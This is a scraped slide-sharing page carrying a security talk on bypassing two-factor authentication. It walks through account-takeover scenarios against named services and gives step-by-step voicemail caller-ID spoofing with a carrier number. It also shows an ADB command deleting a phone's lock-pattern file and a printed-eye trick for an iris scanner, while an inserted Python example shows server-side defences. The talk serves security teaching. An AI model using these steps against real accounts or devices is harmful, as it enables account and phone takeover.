"Introduction to Bug Hunting", Yasser Ali
 
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo..."Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
 
Владимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challengesВладимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challenges
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 

Kürzlich hochgeladen

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 

Kürzlich hochgeladen (20)

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 

"Bypassing two factor authentication", Shahmeer Amir

  • 1. Shahmeer Amir (ШАХМЕЕР АМИР). Bypassing two-factor authentication using the simplest methods. CEO @ Veiliux. Bypassing Multi Factor Authentication
  • 2. WHO AM I? • Penetration Tester and Founder @ Veiliux • Cyber Security researcher • Leisurely Bug Bounty Hunter • M.Sc Security Science • Pursuing Ph.D in Information Security
  • 3. AGENDA • What is 2FA • Conventional 2FA implementations in web applications • Methods of bypassing 2FA in web apps • Methods of bypassing MFA in mobile phones • Foreword about Face ID
  • 4. 2FA, WHAT IS IT? Two-factor authentication requires a second proof of identity in addition to the password before an online portal grants access, typically a one-time code generated by, or delivered to, a handheld device the user holds.
  • 5. IS 2FA SECURE? While most organizations consider it a secure means of authenticating their users into their portals, there are methods by which two-factor authentication can be bypassed. None of the bypasses in this talk attack the OTP algorithm itself; they attack the application logic around the second step (session handling, response and request manipulation, alternative login paths) and the channel that delivers the code.
  • 6. SEVERAL 2FA IMPLEMENTATIONS • SMS • 3rd-party software (authenticator apps)
  • 8. TYPES OF 2FA TOKENS There are three OATH OTP types that are the most widely used: • Event-based tokens (HOTP, RFC 4226) • Time-based tokens (TOTP, RFC 6238) • Challenge-based tokens (OCRA, RFC 6287)
  • 9. EVENT BASED TOKEN An OTP system generates event-based tokens on demand from a static random key shared with the server and a counter that advances each time a token is used; the server keeps its own copy of the counter and must refuse counter values it has already accepted.
  • 10. TIME BASED TOKEN An OTP system generates time-based tokens automatically every so often (typically every 30 seconds) from the same kind of static random key and a dynamic time value, the current time divided into fixed-length steps.
  • 11. CHALLENGE BASED TOKEN An OTP system generates challenge-based tokens on demand from the key and a random challenge that the authentication server provides at each unique user log-in, so the response is bound to that particular login attempt.
  • 12. BYPASSING 2FA IN WEB APPS • Bypassing 2FA in Mapbox (session management) • Bypassing 2FA in an e-wallet (response manipulation) • Bypassing 2FA in PayPal ("try another way") • Bypassing 2FA in Recurly (automatic login after password reset) • Bypassing 2FA in RelateIQ (universal OAuth bug) • Bypassing 2FA via exploiting voicemail
  • 13. RECURLY 2FA BYPASS Cause of vulnerability: automatic login of users after a password change.
  • 14. RECURLY 2FA BYPASS (Cont.d) Process flow: • User requires a password change • User requests a password reset token • User changes the password via the token • Application logs the user in automatically after the change, without asking for the second factor
  • 15. RECURLY 2FA BYPASS (Cont.d) Abusive scenario: • Attacker has the victim's credentials • Attacker logs in and is faced with the 2FA page • Attacker requests a password reset token instead • Attacker changes the password and is logged in; the 2FA page is never shown on this path
  • 16. RECURLY 2FA BYPASS (Cont.d)
  • 17. E-WALLET 2FA BYPASS Cause of vulnerability: the outcome of the 2FA step is decided on the client from the server's response, and the server does not itself record and enforce that the second factor was verified.
  • 18. E-WALLET 2FA BYPASS Complete takeover of accounts using response manipulation.
  • 19. E-WALLET 2FA BYPASS Abusive scenario: • Attacker logs into the account with the victim's credentials • Attacker submits an incorrect 2FA code • Attacker intercepts the server's response with Burp Suite Proxy • Attacker changes the status code to 200 OK and the response body to the success data • The client proceeds as if the code had been correct
  • 20. PAYPAL 2FA BYPASS • Cause of vulnerability: manipulation of the secret-question ("try another way") request.
  • 22. PAYPAL 2FA BYPASS Abusive scenario: • Attacker logs into the account • Attacker selects the alternative login option (security questions) • Attacker enters incorrect answers • Attacker intercepts the request with Burp Suite • Attacker removes the "challenge" and "response" fields from the request • Attacker is granted access: the server treats the absent fields as a passed check rather than a failed one
  • 23. RELATEIQ 2FA BYPASS • Cause of vulnerability: OAuth manipulation. Logging in through a linked social account skips the 2FA prompt that the password login enforces.
  • 25. RELATEIQ 2FA BYPASS Abusive scenario: • Attacker compromises the user's Facebook account • Attacker clicks on "Login via Facebook" • Attacker is granted access to the victim's account without being asked for the second factor
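The four web bypasses above (Recurly, slides 13-16; the e-wallet, 17-19; PayPal, 20-22; RelateIQ, 23-25) share one root cause: the decision that the second factor has been satisfied is not held and enforced by the server on every entry path. The following login state machine is an added example, not code from the talk or from any of the vendors named, showing how a server closes all four gaps at once. `AuthServer`, `Session`, the in-memory `users` dictionary and the plaintext `otp_code` field (a stand-in for a real HOTP/TOTP check) are assumptions made for the illustration; password hashing is likewise omitted.

```python
"""Server-side login state machine that closes the logic gaps exploited above.

Added example; not vendor code.  Rules it enforces:
  * a password, a password reset, or an OAuth login never yields a usable
    session on its own: if the account has 2FA enabled the session starts
    in MFA_PENDING (Recurly, RelateIQ);
  * whether 2FA passed lives in server-side session state and is checked
    on every protected request, so a client that rewrites the response to
    "200 OK" gains nothing (e-wallet);
  * an alternative verification path must receive and validate its
    challenge/response fields; absent fields are a failure, not a pass
    (PayPal).
"""
import hmac
import secrets
from dataclasses import dataclass, field

MFA_PENDING = "mfa_pending"
VERIFIED = "verified"


@dataclass
class Account:
    password: str                     # plaintext stand-in; a real system stores a hash
    mfa_enabled: bool
    otp_code: str                     # code the user's token currently yields (stand-in)
    security_answers: dict = field(default_factory=dict)   # challenge -> expected answer


@dataclass
class Session:
    user: str
    state: str


class AuthServer:
    def __init__(self, users):
        self.users = users
        self.sessions = {}            # token -> Session, held only on the server

    def _start_session(self, user):
        """Every entry path funnels through here, so none of them can skip the gate."""
        state = MFA_PENDING if self.users[user].mfa_enabled else VERIFIED
        token = secrets.token_hex(16)
        self.sessions[token] = Session(user, state)
        return token

    def login(self, user, password):
        acct = self.users.get(user)
        if acct is None or not hmac.compare_digest(acct.password, password):
            return None
        return self._start_session(user)

    def reset_password(self, user, reset_token_ok, new_password):
        """Changing the password is not a login: the new session still has to pass MFA."""
        if not reset_token_ok or user not in self.users:
            return None
        self.users[user].password = new_password
        return self._start_session(user)

    def oauth_login(self, user, provider_asserted_identity):
        """Social login is just another first factor; it cannot stand in for the second."""
        if user not in self.users or provider_asserted_identity != user:
            return None
        return self._start_session(user)

    def submit_otp(self, token, code):
        """Second-factor check decided and recorded on the server, never on the client."""
        sess = self.sessions.get(token)
        if sess is None or sess.state != MFA_PENDING:
            return False
        acct = self.users[sess.user]
        if not code or not hmac.compare_digest(acct.otp_code, code):
            return False
        sess.state = VERIFIED
        return True

    def submit_security_answers(self, token, form):
        """'Try another way': a request with the fields stripped fails closed."""
        sess = self.sessions.get(token)
        if sess is None or sess.state != MFA_PENDING:
            return False
        challenge, response = form.get("challenge"), form.get("response")
        if not isinstance(challenge, str) or not isinstance(response, str):
            return False
        expected = self.users[sess.user].security_answers.get(challenge)
        if expected is None or not hmac.compare_digest(expected, response):
            return False
        sess.state = VERIFIED
        return True

    def get_balance(self, token):
        """The gate every protected endpoint goes through; None means 403."""
        sess = self.sessions.get(token)
        if sess is None or sess.state != VERIFIED:
            return None
        return {"user": sess.user, "balance": 42}   # constructed sample data


if __name__ == "__main__":
    users = {"alice": Account("pw", True, "123456", {"pet": "rex"})}
    server = AuthServer(users)
    t = server.login("alice", "pw")
    print("after password only:", server.get_balance(t))        # None: still MFA_PENDING
    print("after correct OTP:", server.submit_otp(t, "123456"), server.get_balance(t))
```

The point of routing `reset_password` and `oauth_login` through `_start_session` is that adding a new entry path later (magic link, SAML, a mobile API) inherits the gate instead of having to remember it; the point of `get_balance` checking `sess.state` rather than a flag carried by the client is that nothing the proxy rewrites on the wire changes the server's view.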
  • 26. BYPASSING 2FA VIA VOICEMAIL Cause of vulnerability: exploiting voicemail.
  • 27. BYPASSING 2FA VIA VOICEMAIL Process flow: • User logs in • User requests the 2FA code via a phone call • User gets a call from someone else at the same time • User's 2FA code is read into voicemail
  • 28. BYPASSING 2FA VIA VOICEMAIL Abusive scenario: • Attacker logs into the victim's account • Attacker engages the victim's phone number in a call • Attacker chooses the "2FA code via phone call" option • As the victim is busy on the attacker's call, the 2FA phone-calling service immediately sends the 2FA code to the victim's voicemail • Attacker retrieves the code from the voicemail (following slides)
  • 29. EXPLOITING VOICEMAIL Step 1: Obtain an ANI/Caller ID spoofing service, either via a VoIP provider or via a dedicated spoofing provider.
  • 30. EXPLOITING VOICEMAIL Step 2: For all the services in the Australian region, enter the destination number as +610411000321.
  • 31. EXPLOITING VOICEMAIL Step 3: Enter the "Caller ID to Display" as the victim's mobile number.
  • 32. EXPLOITING VOICEMAIL Step 4: If you're using SpoofCard, a number and an access code are displayed. Call this number and input the access code.
  • 33. EXPLOITING VOICEMAIL Step 5: You will be connected to the endpoint of the victim's voicemail service provider. Input the victim's mobile number and press #. The mailbox opens because the service trusts the displayed (spoofed) caller ID as proof that the caller owns the number.
  • 34. EXPLANATION FOR USING THE VM NUMBER • All resellers use the exact same main services as Optus does • The primary number to call for voicemail is "321" • When spoofing, we need a remote number to call, as "321" cannot be reached from outside the carrier's own network • Australian cellular providers provide a remote number to call in case customers are overseas. This number is +610411000321
  • 35. 2FA BYPASS IN MOBILE PHONES • Bypassing pattern lock via ADB • Bypassing the S8 iris scanner
  • 36. BYPASSING PATTERN LOCK USING ADB This option works only when USB debugging was previously enabled on the device, the PC has been authorised to connect via ADB, and the ADB shell is allowed to delete files under /data/system (a rooted device on an older Android release that stores the pattern hash in gesture.key). If these requirements are met, this is the method to use to unlock a Samsung lock screen.
  • 37. BYPASSING PATTERN LOCK USING ADB How to: • Connect the device to the PC with a USB cable and open a command prompt in the ADB directory • Type the command "adb shell rm /data/system/gesture.key" and press Enter
  • 38. BYPASSING IRIS SCANNER IN S8 • Take a photo of the person's eye (lens: 200 mm; distance: 15 mm; print: high-quality colour copy) • Place a wet contact lens over the printed eye to imitate the curvature and reflection of a real one and hold it to the scanner; the phone unlocks. With a sufficient amount of time and complete access to the phone, you could theoretically unlock any Galaxy S8 with iris scanning enabled.
  • 39. LET'S SEE HOW IT IS DONE
  • 41. SO, HOW CAN IT BE HACKED? The Secure Enclave Processor: the images captured by Face ID are kept in the encrypted memory of Apple's special coprocessor, the Secure Enclave Processor (SEP).
  • 42. SEP, WHAT IS IT? • A security circuit designed to perform secure services for the rest of the SoC • SEP has its own set of peripherals accessible by memory-mapped I/O • Dedicated I/O lines • Runs its own operating system (SEPOS)
  • 44. THE FUTURE OF FACE ID IS BASED ON SEP • SEP(OS) lacks basic exploit protections, e.g. no memory layout randomization • The shared PMGR and PLL are open to attacks • The inclusion of the fuse source pin should be re-evaluated • The demotion functionality appears rather dangerous